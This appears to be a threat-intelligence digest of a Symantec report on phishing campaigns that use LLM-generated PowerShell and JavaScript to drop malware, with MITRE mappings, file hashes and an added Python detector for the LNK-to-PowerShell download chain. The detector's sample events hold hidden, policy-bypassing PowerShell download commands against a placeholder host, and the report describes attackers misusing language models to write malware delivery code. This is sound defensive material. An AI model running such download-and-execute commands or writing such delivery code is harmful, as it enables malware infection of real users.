Symantec reports AI-assisted attacks where Large Language Models generate code used to download payloads. Campaigns include Rhadamanthys, NetSupport, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and Dunihi (H-Worm). #Rhadamanthys #NetSupport #CleanUpLoader #Broomstick #Oyster #ModiLoader #DBatLoader #LokiBot #Dunihi #HWorm #Symantec
Keypoints
- Symantec observes a rise in campaigns that use Large Language Models to generate malware-delivery scripts and code.
- Phishing emails deliver password-protected ZIP attachments containing LNK files that trigger LLM-generated PowerShell scripts.
- LLM-generated HTML/JavaScript code facilitates the initial access and payload delivery stages of campaigns.
- Final payloads include Rhadamanthys, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and NetSupport.
- The attack chain progresses from user interaction with the malicious attachment to downloading and executing additional payloads via LLM-generated PowerShell scripts.
- Symantec emphasizes AI’s dual potential: societal benefits alongside increased cybercriminal sophistication; Symantec offers protections against these AI-driven threats.
MITRE Techniques
- [T1566] Phishing – Spearphishing emails are crafted to appear legitimate, often mimicking important notifications (e.g., HR notifications). “Initial access: User receives a human-crafted phishing email with an attachment, mimicking an HR notification.”
- [T1059.001] PowerShell – Execution of LLM-generated PowerShell scripts triggered by user interaction with malicious attachments. “Opening the malicious attachment executes an HTML file with embedded JavaScript that is highly likely generated by an LLM.”
- [T1059.007] JavaScript – LLM-generated HTML/JavaScript content facilitates payload delivery. “HTML file with embedded JavaScript that is highly likely generated by an LLM.”
- [T1105] Ingress Tool Transfer – The LLM-generated HTML/JavaScript code is designed to download and execute additional payloads. “designed to download and execute additional payloads.”
- [T1203] User Execution – Users are tricked into executing malicious files (e.g., .lnk files) that lead to further payload downloads. “Initial access: User receives a human-crafted phishing email with an attachment, mimicking an HR notification.”
- [T1219] Remote Access Tools – Campaigns deliver NetSupport remote access Trojan among final payloads. “NetSupport remote access Trojan.”
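The chain summarised in the techniques above (attachment opened from the shell, LNK launching PowerShell, PowerShell fetching the next stage) is a good fit for a process-tree heuristic. The following is an added example, not Symantec's code and not derived from the samples in the report: it scores constructed process-creation events (assumed fields `pid`, `ppid`, `image`, `cmdline`, modelled loosely on Sysmon Event ID 1) and flags PowerShell that is spawned by the shell or an archiver, carries a download cmdlet, or uses hidden-window / policy-bypass switches. The parent names and command-line patterns are assumptions from general PowerShell telemetry, not indicators from the page.

```python
"""Heuristic detection for the LNK -> PowerShell -> payload-download chain.

Added example; the sample events below are constructed for illustration and
do not come from the Symantec report.
"""
import re
from typing import Dict, List, Optional

# Constructed process-creation events (assumed field names: pid, ppid, image, cmdline).
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 1100, "ppid": 900, "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"pid": 4120, "ppid": 1100, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # LNK double-click: the shell launches hidden PowerShell that fetches the next stage
    {"pid": 5210, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest http://example.invalid/s -OutFile $env:TEMP\\s.zip"'},
    # Benign: user opens a document from the shell
    {"pid": 5300, "ppid": 4120,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "cmdline": "WINWORD.EXE report.docx"},
    # Benign: service-launched PowerShell script, visible window, no download
    {"pid": 5400, "ppid": 1100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    # Shell-launched PowerShell with a download cmdlet but no evasion switches: weaker signal
    {"pid": 5500, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
]

# Assumed parent processes from which an LNK-style launch would originate.
SHELL_PARENTS = {"explorer.exe", "winrar.exe", "7zfm.exe"}
# Common download primitives in PowerShell command lines (assumption, not page IoCs).
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Net\.WebClient|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
# Switches that hide the window, bypass execution policy, or pass an encoded command.
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-enc(?:odedcommand)?\b", re.I)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict, parent: Optional[Dict]) -> List[str]:
    """Return the list of reasons this PowerShell event looks like the LNK chain (empty if none)."""
    reasons: List[str] = []
    if basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return reasons
    if parent is not None and basename(parent["image"]) in SHELL_PARENTS:
        reasons.append("powershell spawned by shell/archiver (LNK-style launch)")
    if DOWNLOAD_RE.search(ev["cmdline"]):
        reasons.append("download primitive in command line")
    if EVASION_RE.search(ev["cmdline"]):
        reasons.append("hidden window / policy bypass / encoded command")
    return reasons


def detect(events: List[Dict], threshold: int = 2) -> Dict[int, List[str]]:
    """Map pid -> reasons for every event that accumulates at least `threshold` reasons."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[int, List[str]] = {}
    for ev in events:
        reasons = score_event(ev, by_pid.get(ev["ppid"]))
        if len(reasons) >= threshold:
            findings[ev["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(f"pid {pid}: " + "; ".join(reasons))
```

With the default threshold of 2, the hidden, policy-bypassing download (pid 5210) is reported with three reasons and the plainer shell-launched `DownloadString` (pid 5500) with two; the service-launched backup script and the Word document never score. Raising the threshold to 3 keeps only the strongest match, which is the usual trade-off between catching interactive-but-legitimate PowerShell use and surfacing the hidden-window downloader pattern this campaign relies on.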
Indicators of Compromise
- [PowerShell script] – 0A90FADE657A0C0AC73D4E085E168AA8515994700A12612D1C20CB00ED15A0CA, F5FC667D818A26FBB5C04657B131D86AF1746A349CEB9D6E441D24C8673393B2
- [LNK file] – 30DD8CBBA98F2E4CBB8D8D85A7A9AC97B0157A77C83D9B8DEAB50C2225C0CB22, 948D0D1FABBD858C13C387737EF833BEB982141CFC2E2D0E26024918EB0AF479
- [Rhadamanthys] – 121E900D1EFC6D9E537471360848B333BFBBB7E08ECADB1D75897882CE2DCB20, 29F8B50F737FEEF9EC7439780DAEAD395BF2BF278A4540DDFFE64CA70AA9F462
- [JavaScript] – 2AE6737D691BFF402FC50A29EDDCBE9FD0B0C18250776435F61CE70F3C9481CD, BC824A97E877EF38D5D14E0D51433F3890873B58B710C0E5D41A4638A1A3FAF4
- [HTML] – 9BD692BC32E13185232E95FF7693D0039B5C5C563323982BFAB34A5D1E0379AE, B1D48CA54EFB57B9BD626420391FBBC638C9F4271F009DFB31B28C33B76A4228
- [ZIP file] – 4153F2CE9CD956B29A1D1F21669932596FD1564863F65782D1EEA4E06E8623F7, 5077EEE9D9933E1DB4B311B893A8F3583CA9F0D9F6DB33938A67BF5054133AA8
- [Password-protected ZIP file] – 3A88FCB26F7A6BE68B65AB18D8358365E9A4FD7D4C0EF8FC581771CCFB746271, 44B3095A86F2091CCB9B52B9ECF995BC5B9E2294EB9E38D90E9FD743567F5F22
- [EXE file] – A2C1B716D20B61BC4C57748E1EC195FBAC2C5B143CF960D0FFEE895160D4B0DB, B6AADA8476838CD39EFD5A3681F50ECEB0938BBCDECD3712FDB81394ED2922BB
- [CleanUpLoader] – BB932056CAE8940742E50B4F2B994A802E703F7BC235E7DD647D085AE2B2BAF7, C398B3E06EF860670B9597DAED85632834FA961AEA87164B8BA8BB2F094A14EF
- [VBS] – BCDB4F1AF705889ACE73E8A0C8626BC6B615393A4C4F28EA00E5A51EB6E541D9, CD003F5CE0DDE74B9793685C549A6883B405FCA4D533F27FBB050199A2339A28
- [RAR file] – F06D83CE130BAE96EBFDE9ADDDD0FF1245FEBF768E6D984B69816B252808BA0C
Read more: https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm